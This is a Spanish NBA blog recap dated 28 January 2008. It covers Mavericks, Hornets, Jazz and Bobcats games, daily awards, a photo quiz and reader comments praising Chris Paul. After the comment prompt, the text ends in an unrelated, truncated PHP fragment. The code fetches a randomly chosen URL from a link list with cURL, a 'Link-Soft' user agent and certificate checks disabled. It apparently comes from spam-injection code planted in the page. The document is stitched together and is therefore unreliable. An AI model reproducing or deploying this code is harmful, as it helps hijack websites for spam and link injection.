La crónica (28/01/08)

29 de January de 2008 por MagicJohnson32

La noche del lunes al martes dejó cuatro partidos y protagonismo de los equipos de la Conferencia Oeste. El único del Este en jugar fue Charlotte, y no le fue nada mal. Pero antes de entrar en detalle con lo ocurrido, veamos una de las mejores acciones de estos partidos:

La crónica:

jcnavarromavsbombaArrancó la actividad en Memphis, donde los Mavs se pasearon en el primer partido de una gira que les llevará jueves, domingo y lunes a las pistas de los tres líderes del Este, Boston, Detroit y Orlando. Así que nada mejor que encarrilar pronto el triunfo ante los Grizzlies con un 33-19 en el primer cuarto y un Josh Howard inspiradísimo que anotó sus ocho primeros lanzamientos. Gasol regresó tras sus problemas de espalda aunque sólo jugó 28 minutos mientras que Navarro actuó de nuevo como sexto hombre. Las correctas actuaciones de ambos no evitaron la victoria visitante 103-84.

Tal vez como reivindicación por haberse quedado fuera de los quintetos iniciales para el All-Star Game, Chris Paul firmó anoche 23 puntos y 17 asistencias y, ante todo, dirigió un nuvo triunfo de los imparables Hornets, que ya están con un espectacular balance de 32-12. Ante los Nuggets, en los que Carmelo boozerudokasigue siendo baja, dominaron desde el inicio y al descanso ya acumulaban 23 puntos de renta, que al final fue de 24, 93-117. Otros cinco jugadores acompañaron a Paul por encima de la decena de puntos, incluyendo Pargo y Melvin Ely desde el banquillo, mientras que Iverson y Kenyon Martin fueron de lo poco destacado por Denver.

En Salt Lake City se encontraron dos equipos con tendencias opuestas: los Jazz, que parecen haberse recuperado tras un final de año muy negativo, y los Spurs, inmersos en una mala racha de juego y, hasta cierto punto, de resultados. El equipo local tomó la iniciativa en el marcador en un partido duro y tenso, y jamás cedió la delantera para imponerse por 91-97 apoyados en las 14 asistencias de Deron Williams, los 23-7-7 de Carlos Boozer y la noche casi infalible de Kirilenko, que anotó 9 de sus 10 lanzamientos de campo y sus cuatro tiros libres. Por los Spurs, entre Duncan y Ginóbili lograron más de un 60% de los puntos de su equipo, pero la desastrosa noche de casi todos sus compañeros, empezando por Parker, dejó sin opciones a los de Popovich.

En el último partido de la noche, los Bobcats aprovecharon que la lista de bajas de los Clippers no hace más que crecer. Sin Brand, ni Livingston, y ahora también sin Kaman ni Maggette, los angelinos ya hicieron más que suficiente dando la cara ante Charlotte en un partido que se decidió por 107-100. El gran partido de Tim Thomas no fue suficiente ante un rival en el que todo el quinteto y dos suplentes anotaron más de 10 puntos.

Los premios:tthomasbobcats
Nuestro MVP: Gerald Wallace ha tenido otra actuación de ensueño: 8 de 11 en tiros, 23 puntos, 8 asistencias, 6 rebotes y 3 robos. Pero no será el MVP porque ha tenido la mala suerte de coincidir con el partidazo de Chris Paul, que ha destrozado literalmente a los Nuggets con 23 puntos, 17 asistencias y 9 rebotes.

El rookie: Pocos rookies han jugado hoy y sólo uno, Al Thornton, ha tenido una actuación digna de mención. Para él va el título.

La sorpresa: Posiblemente Kenyon Martin se merezca ganar un día el galardón de sorpresa aunque lo suyo es una sorpresa global. Partido a partido demuestra que vuelve a ser jugador de baloncesto y que se le tiene que tener en cuenta de nuevo. Pero hoy, la verdadera sorpresa ha sido Tim Thomas, jugador de unas condiciones envidiables y que, ante las bajas de Maggette, Kaman y Brand, ha liderado a su equipo con 29 puntos y 13 rebotes.

La decepción: Lamentable partido de Marcus Camby que en 27 minutos de juego sólo ha podido recoger 5 rebotes y anotar 3 puntos. Pero aún más lamentable si cabe ha sido el de Tony Parker: 1 de 7 en tiros, 5 puntos, 3 rebotes y 3 asistencias en 32 minutos de juego. Duncan y Ginóbili se han quedado solos.

Pasatiempos: ¿Qué trata de hacer Tyson Chandler?

tychandlerchrispaulhornetsA) consuela a Chris Paul por no estar en el quinteto inicial del All-Star Game.

B) le toma las medidas para hacerle un monumento por su temporadón.

C) le protege de Mo Peterson para que no se le peguen sus porcentajes de tiro.

D) le felicita por su gran actuación ante los Nuggets, otra de tantas.

Respuesta correcta: la D, aunque por New Orleans habrían de empezar a plantearse la B, y sobre todo habrían de empezar a llenar el pabellón para no quedarse sin franquicia y sin este maravilloso jugador.

El premio, en este caso, es para los que dejaron a Paul fuera del quinteto en sus votaciones para el All-Star Game, y consiste en una pancarta que reza: “20.6 + 10.5 + 3.9 + 2.6 = 32-12”, es decir, los puntos, asistencias, rebotes y recuperaciones de balón de Chris Paul, y el balance que presentan a estas alturas los Hornets, insospechados líderes de la Conferencia Oeste.

Comenta

5 comentarios a esta entrada

  1. telekoman dice:
    #1

    Sin duda Paul es el base dominador de al menos los próximos 8 años, junto con Deron Williams y Calderón (ojalá)

      Citar

  2. Noelinho dice:
    #2

    Reconozco que hace un tiempo dudaba entre Deron y Paul, pero después de pedir perdón y hacer penitencia rectifico. Paul es el futuro de la NBA.

      Citar

  3. MagicJohnson32 dice:
    #3

    Bah, CP no tiene nada que hacer ante Smushhhhhhh!

      Citar

  4. ToNHo-85 dice:
    #4

    Estadísticamente no hay mucha diferencia entre DW y CP, pero pienso que el mérito de CP es mucho mayor al estar en el equipo que está.

      Citar

  5. MagicJohnson32 dice:
    #5

    Bueno, a mí Deron me encanta, y sigue mejorando, por ejemplo cada vez lanza mejor. No es tan eléctrico y espectacular como CP3, pero es un gran director, uno de los mejores que hay.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>